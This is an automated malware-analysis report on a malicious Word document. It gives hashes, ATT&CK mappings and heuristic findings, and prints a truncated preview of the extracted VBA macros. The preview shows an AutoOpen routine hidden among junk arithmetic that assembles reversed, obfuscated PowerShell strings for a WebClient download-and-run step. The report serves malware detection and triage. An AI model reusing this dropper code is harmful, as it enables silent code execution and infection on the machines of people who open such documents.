Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 f2e96a7bbfa948ad…

MALICIOUS

Office (OLE)

Size: 154.0 KB
Created: 2018-05-07 11:41:00
Authoring application: Microsoft Office Word
First seen: 2019-01-11
MD5: 3b029a284982ba2163231817a63d40dc
SHA-1: fc500115ab30f6af4dd354fc5e966d54f983f50b
SHA-256: f2e96a7bbfa948adf24ff6509142ad3702d7f68292e078c93b7e535c3cbb8fc3
Risk score: 142

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File

The sample is a malicious Office document containing VBA macros. The critical heuristic indicates a Shell() call within the VBA code, and the AutoOpen marker indicates the macro runs automatically when the document is opened. This combination is commonly used to download and execute further malicious content.

Heuristics (5)

  • VBA macros detected [medium] OLE_VBA_MACROS (2 related findings)
    Document contains VBA macro code
  • Shell() call in VBA [critical] OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro [high] OLE_VBA_AUTOOPEN
    AutoOpen macro
  • Legacy WordBasic auto-exec macro marker [medium] OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL [info] EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 130184 bytes
SHA-256: 9681ea6f7d4c671b4f4cbe660d46f565e950fb27768b3c3698c891fdf3c9995f
Preview script (first 1,000 lines of the extracted script)
Attribute VB_Name = "BHoiuPq"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub GKjYwN(PmPHb)
Set iWsptJ = OTZOzU
CBszKh = LZPUCr
zjXFG = wYpKt + Atn(GOnlR) + 52476 - 57373 / (72921 * Hex(NuQzu))
WzdUq = 34518 + PnBJq
End Sub
Sub fdMiG(aMYnzt)
Set GBmmH = MrZbL
Cwnzzk = kYGdA
KBTLz = fbRLS + Atn(BuBiOG) + 3499 - 1618 / (87802 * Hex(wmMZD))
IBzXla = 93416 + sjbRf
Set llVWw = GFJAbz
HDhwY = qSPMu
azwlii = UjRNRq + Atn(NiCrzw) + 73254 - 16997 / (79132 * Hex(LhDLp))
VYbiYs = 19706 + bVril
Set qQHztI = YMzFR
taAbZ = lvoqLC
YiQdF = XzMva + Atn(RjizM) + 56655 - 48822 / (12293 * Hex(QtauRw))
uBZwuY = 68815 + IjswuJ
End Sub
Sub faVHwH(cMmwkH)
Set pinIXE = VdKtz
pclbMa = NAYKzs
ZNJwob = SAEpWE + Atn(KwLOB) + 18935 - 16182 / (99554 * Hex(KkJYcp))
dIfHl = 15303 + MEVGX
Set hlpWMD = Nwwio
lwOiD = cqahr
kCczJj = lXuZu + Atn(LZlwhK) + 94345 - 37767 / (23661 * Hex(VzaRr))
lGEwZc = 810 + OmRiDB
End Sub
Sub Autoopen()
On Error Resume Next
Set ZTrrpr = tWudYj
BjPMq = nVwNjY
iutSQ = iviia + Atn(DrMhE) + 92350 - 7211 / (38273 * Hex(NDCSM))
DEWdI = 33178 + LwdbMN
jkzHDdElr (LWApL + zTiBFhbiIDFm + uansRf)
Set qUrrz = uarIE
jWfOD = jpRIqC
HYVdQ = LcMqrH + Atn(cISbUO) + 93005 - 44802 / (52114 * Hex(OMjQi))
nhdods = 60840 + zadsp
End Sub
Sub joGRz(WpncGp)
Set HGQhNd = ZINSIj
tiukDi = kaGSQ
SzuBi = LXShsP + Atn(CwXan) + 16419 - 30829 / (96868 * Hex(LtrCHc))
jJOzV = 38222 + OMjUYE
Set zBUofF = zSJAJ
lAJjjj = lXdSt
WJODnr = CNsXOc + Atn(KhrFz) + 24290 - 58554 / (81057 * Hex(CDooE))
aXCuzj = 5852 + OVIPmY
Set mSELq = jYUhE
vLAzDp = nUUUi
Hzcjpz = RFQljd + Atn(luwhN) + 86521 - 6233 / (14231 * Hex(NWFaZ))
nRzZXi = 12657 + pfkMO
End Sub
Sub vPPZac(WnHllA)
Set OMjWR = SznKFf
qIBcjp = dwGfz
sRdqnm = hodvNu + Atn(XwcFUv) + 94932 - 3885 / (26131 * Hex(iFvivP))
EXUoB = 40927 + XTzwBf
End Sub

Attribute VB_Name = "PlHujWB"
Sub EAqDr(hqzlY)
Set rqasV = fhAzAA
jOTnoP = EtTUwz
jpczLc = OZLPY + Atn(qTKGz) + 80706 - 41280 / (20790 * Hex(OCLWfS))
XFtXzv = 85890 + ApXZS
End Sub
Function zTiBFhbiIDFm()
On Error Resume Next
Set HYPJCk = MUIcSl
amozpQ = GWAIv
nGKSvs = GivNd + Atn(PKlkvi) + 20183 - 34029 / (94913 * Hex(BZjCn))
CPBHJ = 91395 + Kpjac
Set ZGBiph = hYvKV
YzCFjn = ofYBd
iFkqIr = aDovv + Atn(AaZCm) + 15198 - 42029 / (98288 * Hex(PNAash))
uhABs = 6011 + zhnSA
VDXAnOzsGO = twERIa("1%)CDSi'+'R0()'+'P'+'RM'+'metI'+'-'+'e'+'PR'+'M+PR'+'Mk'+'PR'+'M+PRM'+'o'+'v'+'n'+'IP'+'RM(&;)CDSi'+'R'+'0 ,'+')('+'lyTgNt07it0'+'7rtSo'+'T'+'ly'+'T.cfsaiR0('+'lyTelt'+'07I'+'FdaO'+'t'+'07l'+'h@mMEl", 14668 - 14668 + 7 + 14668 - 14668, 14668 - 14668 + 190 + 14668 - 14668)
Set VKGKV = bPdmtH
kpWqhz = XJGutR
HbVzpV = YFGqEF + Atn(oRvHu) + 88470 - 36172 / (58054 * Hex(qFTNqM))
LQEoU = 77668 + nElML
Set WHUGu = fPVfP
NpNzw = Ylpnbp
IznbkA = FWwUHW + Atn(XCnOK) + 52288 - 27517 / (40268 * Hex(bRAsOH))
ifiUm = 23953 + nkfkDq
SnpPsjkJN = twERIa("hX@APqHc[+79]RAHc[( ecALPErC-43]RAHc[,)801]RAHc[+121]RAHc[+48]RAHc[(  ECAlPER- 6O3", 68070 - 68070 + 3 + 68070 - 68070, 68070 - 68070 + 74 + 68070 - 68070)
Set trZiBi = ZROYn
MJjHQz = QocBO
KAiiq = iJhZb + Atn(MZTJO) + 31700 - 92611 / (97883 * Hex(fdAXU))
paFPY = 38405 + XBumYN
Set PwIkld = ozvqa
PzTlR = Krajiv
RPAfwz = mrHRVW + Atn(ObvDd) + 94096 - 10171 / (22944 * Hex(JzQUNq))
PZoIMt = 76886 + wspiX
pRzcbiY = twERIa("kE0niR0 = B'+'S'+'NiR'+'0'+';'+'tne'+'ilC'+'beW.te'+'N'+'.met'+'s'+'yS '+')PRM'+'tce'+'jb'+'o-'+'PRM+PR'+'MwP'+'RM+PRMen'+'P'+'R'+'M(. = UYY'+'iR0;modnar )PRMtP'+'RM+PR'+'M'+'cejbo-w'+'PR'+'M+PRM'+kwJZ", 17912 - 17912 + 5 + 17912 - 17912, 17912 - 17912 + 194 + 17912 - 17912)
Set CQuhvQ = cFwYFj
jidXwC = shOqUn
HkHWop = jVmRa + Atn(mUpkH) + 19996 - 95328 / (71611 * Hex(PRmVz))
ijrac = 4259 + UrBRt
Set oCzRrO = sibwsp
PwGPW = FkAWz
GbliK = NpwVvi + Atn(fzLMW) + 63875 - 52493 / (3855 * Hex(vNhWDw))
ECaTkH = 3551 + vQIiz
JiHGVi = twERIa
... (truncated)